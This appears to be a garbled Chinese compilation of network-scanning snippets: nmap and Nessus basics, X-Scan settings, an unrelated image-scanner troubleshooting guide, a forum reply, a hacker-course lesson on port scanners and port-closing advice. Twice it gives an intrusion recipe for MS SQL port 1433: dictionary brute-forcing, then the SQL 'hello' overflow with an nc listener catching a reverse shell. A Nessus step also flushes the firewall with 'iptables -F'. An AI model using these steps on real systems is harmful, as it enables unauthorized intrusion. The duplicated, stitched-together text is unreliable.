nmap(Network Mapper)是一款开放源代码的网络探测和安全审核工具。它用于快速扫描一个网络和一台主机开放的端口,还能使用TCP/IP协议栈特征探测远程主机的操作系统类型。nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。Nmap最初是用于unix系统的命令行应用程序。在2000年的时候,这个应用程序有了windows版本,可以直接安装使用。
Nessus是一款扫面漏洞的软件,下面是一些简单的操作。
在打开linux之前先要打开终端在root用户下打出iptables -F关闭防火墙
之后在浏览器打出https://你的ip地址:8834.之后就可以进入nessus中
输入账户名密码就可进入。
进入之后的界面如下:
点new scan前面的加号新建
点下图
配置名字,在最下面加入你要扫寻漏洞的ip
各种端口的入侵方法
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
各种端口的入侵方法
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
服务TCP端口: 179
服务UDP端口: 88
分组延迟: 250
发现通行证: 1
ICMP协议执行ping的主机发现:有
主机的ICMP超时发现: 2000
TCP连接超时抢夺横幅: 8000
UDP连接超时抢夺横幅: 8000
服务扫描通行证: 1
主机解决通行证: 1
全连接的TCP扫描服务扫描:否
配置参数
打开“扫描参数”对话框
启动X-Scan,在其菜单栏中依次单击“设置-扫描参数”命令
打开示例对话框
在“扫描参数”对话框左侧单击“检测范围”选项,然后单击“知道IP范围”文本框后面的“示例”按钮
查看示例格式
在“示例”对话框中查看有效示例格式
设置IP范围
根据前面的示例格式设置ip范围,比如192.168.1.1-192.168.1.255
1.整幅图像只有一小部分被获取 \x0d\x0a故障原因与排除:聚焦矩形框仍然停留在预览图像上;只有矩形框内的区域被获取。在做完聚焦后,点击一下去掉聚焦矩形框,反复试验以获得图像。 \x0d\x0a2.图像中有过多的图案(噪声干扰) \x0d\x0a故障原因与排除:扫描仪的工作环境湿度超出了它的允许范围(也许是扫描仪在允许范围外被存放或运输了)。让扫描仪工作在允许范围内。关掉计算机,再关掉扫描仪,然后先打开扫描仪,再打开计算机,以重新校准扫描仪。 \x0d\x0a3.原稿颜色与屏幕颜色差别太大 \x0d\x0a故障原因与排除:\x0d\x0a(1)检查屏幕的色度、亮度、反差的设定是否合乎正常要求。\x0d\x0a(2)检查ColorLinks的屏幕设定选项是否正确。\x0d\x0a(3)如果FotoLook是外挂在Photoshop下执行,请检查File-Preferences Monitor Setup,Printing lnks Setup和Seperation Setup是否正确。\x0d\x0a(4)假设上述设置皆正确时,可以做一下扫描仪与显示屏之间的色彩校正。 \x0d\x0a4.扫描出的整个图像变形或出现模糊 \x0d\x0a故障原因与排除:\x0d\x0a(1)扫描仪玻璃板脏污或反光镜条脏污;用软布擦拭玻璃板并清洁反光镜条。\x0d\x0a(2)扫描原稿文件未能始终平贴在文件台上;确保扫描原稿始终平贴在平台上。 \x0d\x0a(3)确保扫描过程中不要移动文件。 \x0d\x0a(4)扫描过程中扫描仪因放置不平而产生震动;注意把扫描仪放于平稳的表面上。\x0d\x0a(5)调节软件的曝光设置或"Gamma"设置。\x0d\x0a(6)若是并口扫描仪发生以上情况,可能是传输电缆存在问题,建议使用IEEE-1284以上的高性能电缆。 \x0d\x0a5.扫描的图像在屏幕显示或打印输出时总是出现丢失点线的现象 \x0d\x0a故障原因与排除:\x0d\x0a(1)检查扫描仪的传感器是否出现了故障或文件自动送纸器的纸张导纸机构出现故障,找专业人员进行检查维修。 \x0d\x0a(2)对扫描仪的光学镜头做除尘处理,用专用的小型吸尘器效果最好。\x0d\x0a(3)检查扫描仪外盖上的白色校正条是否有脏污,需及时清洁。\x0d\x0a(4)检查一下稿台玻璃是否脏了或有划痕,可以定期彻底清洁扫描仪或更换稿台玻璃来避免该情况的发生。后一种情况应与当地授权技术服务中心联系。 \x0d\x0a6.扫描印刷品时,龟纹(交叉影像)出现在图像的特定区域内 \x0d\x0a故障原因与排除:首先让我们来了解一下彩色印刷品成像的简单原理。试着拿放大镜观察一下一般的彩色印刷品,其实任何图文都是通过4种颜色来组成,就是经常提及的青色、品红色、黄色与黑色。这些颜色是很细小的墨点(好的彩色印刷应该有1200 dpi的分辨率),利用墨点的排列组合方式让眼睛产生错觉,比如某一区红色的墨点比较多,人脑的视觉系统就会以为这一区偏红色。这样细小的网点,在扫描的时候会被灵敏的感光组件所侦测出来,于是扫描的结果会让整张图片有各种纹路出现,严重影响扫描图像的品质。可以采用以下几种方案来避免龟纹的产生。\x0d\x0a(1)在"图像类型"中选择"彩色照片"(去网纹)设置,或在"图像类型"对话框中选"去网纹"设置。\x0d\x0a(2)在文件和稿台间放置一张透明页,使图像散焦。\x0d\x0a(3)正确定位图像。\x0d\x0a(4)可稍调小图像尺寸。\x0d\x0a(5)在扫描仪的了TWAIN中选中“清除边缘清晰化”复选框。
首先,给你更正一下,估计是你看了别人的教程或者软件,让你以为BAT可以扫端口,严格意义上说批处理文件BAT是不能真正意义上实现扫端口功能,即使有也是利用TELNET。而且是单线程。是没任何意义的。你看到的我估计是S扫描器,然后别人做成一个批处理,比如流行的扫135,1433,3389或者其他溢出都喜欢用S扫描器,因为它速度一流,而且是命令下操作适合做成BAT文件批量处理。而输出扫描结果这个比较简单,就是写几行批处理来提取S扫描器生成的结果Result.txt文件,然后输出到5.txt中。就这么简单。这些代码网上有现成的,如果你有需要可以给我留言,适当的给你分享分享!
扫描器使用方法大家好很高兴你能进如我们的第四课!由先在起所有的课将由我来主讲,由于课程涉及 的是网络最高安全问题,所以我不得不警告各位,你要清楚的认识到你在干什么,其实 第四课的内容我们换了又换,有很多是一些攻击性很强的,我不得不CUT,所以次文才迟 迟出来!!同时我也希望进入这一课时的学友能多多的帮助其它人! 在INTERNET安全领域,扫描器可以说是黑客的基本武器, 一个好的TCP端口扫描器相当与几百个合法用户的口令及 密码是等同的,这样说一点也不过分! 1,什么是扫描器 扫描器是一种自动检测远程或本地主机安全性弱点的程序, 通过使用扫描器你可一不留痕迹的发现远程服务器的各种TCP 端口的分配及提供的服务!和它们的软件版本!这就能让我们 间接的或直观的了解到远程主机所存在的安全问题。 2,工作原理 扫描器通过选用远程TCP/IP不同的端口的服务,并记录目标 给予的回答,通过这种方法,可以搜集到很多关于目标主机的 各种有用的信息(比如:是否能用匿名登陆!是否有可写的FTP 目录,是否能用TELNET,HTTPD是用ROOT还是nobady在跑!) 3,扫描器的运行平台! 尽管大多数的工作站是用UNIX的,由于UNIX的应用软件的可移殖 性,如今的扫描器以有了支持各种平台,这一点大大方便了许多 单机的用户!但同时也带来了更多的网络安全问题,这句老话我想 大家一定是听到过很多次!------网络安全刻不容缓!!! 4,扫描器能干什么? 扫描器并不是一个直接的攻击网络漏洞的程序,它不同于第二课中 的许多NUCK程序!它仅仅能帮助我们发现目标机的某些内在的弱点 而这些现存的弱点可能是(请看清楚可能是,并非一定)破坏目标 机安全关键,但是我想说明的是对于一个刚刚入们的黑客人来说 这些数据对他来说无疑是一个毫无价值的数据集合!,而对一个 掌握和精通各种网络应用程序的漏洞的黑客来说这就不仅仅是一个简单 的数据集合!他的价值远超过几百个有用的帐号!-------知识需要 积累!!! 5,种类 1。NNS(网络安全扫描器) 用PERL编写,工作在Sunos4.1.3 进行下面的常规的扫描 Sendmail ,TFTP,匿名FTP,Hosts.equive,Xhost 增强扫描 Apple Talk, Novell LAN管理员网络 取得指定域的列表或报告! 用PING命令确定指定主机是否是活性的, 扫描目标机端口 报告指定地址的漏洞 你可以到这个地址下载 2.STROBE(超级优化TCP端口检测程序) 它是一个TCP端口的扫描器,能快速的识别指定机器上正运行 什么服务, 用于扫描网络漏洞 SATAN(安全管理员的网络分析工具) 扫描远程主机的许多已知的漏洞 FTPD中可写的目录 NFS NIS PSH SENDMAIL X服务 Jakal(秘密扫描器) 可以不留痕迹的扫描 IdenTCPscan CONNECT 扫描TFTP服务器子网 ESPScan 扫描FSP服务器 XSCAN 实例扫描 或用关键字搜寻!你能了解到更多的情况! 1,UNIX平台的SAFEsuite safesuite的组成,INTERNET,WEB,防火墙扫描! safesuite的攻击,sendmail,FTP,NNTP,TELNET,RPC,NFS. ISS的开发小组在最新的版本里还增设了IP欺骗和拒绝服务的攻击,用以支持对主机安全 性的分析。 可以运行的平台:Sun OS 4.1.3 up,SoLaris 2.0 up,HP/UX9.05 up,IBM AIIX 3.2.5 u p Linux 1.2.x,Linux1.3.x,Linux 1.3.76+ 安装: 解压后拷贝到指定的目录,你可用下面的命令来解! tar -xvf ISS_XXX.tar 运行ISS.install开始安装! 由于扫描的结果太长我就不一一写出来了!!大家可以多试试!很多有用的安全信息都 在这些扫描结果里!!通过MIT的X窗口系统标准配置运行如SAVEsuite,X窗口的管理程 序是FVWM。 Network Toolbox 用于WINDOWS 95上的TCP/IP的应用程序, 默认扫描端口是!14个TCP/IP端口, port 9,13,21,25,,37,79,80,110,111,512,513,514, 你可以通过设置属性来改变默认的配置!! 我不知道我上述的下载地址是否还有效!但我想你可一到一些国外著名的黑客站找到你 想要的一切!! 课后作业,请把你扫描的信息告诉我们,我们将在下一课拿出一些信息来加以分析,安 全漏洞出在哪里!并对各种可能发生的漏洞加以分析!!
楼主你好,端口一天被扫描几十次很正常,楼主可以安装带隐身功能的防火墙,也可以关闭一些端口,方法如下
需要关闭的端口有 TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口
1打开开始菜单菜单- 控制面板-管理工具-本地IP策略-在本地计算机,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择创建 IP 安全策略,然后直到下一步的命名,在画面上把激活默认相应规则左边的钩去掉,点击完成
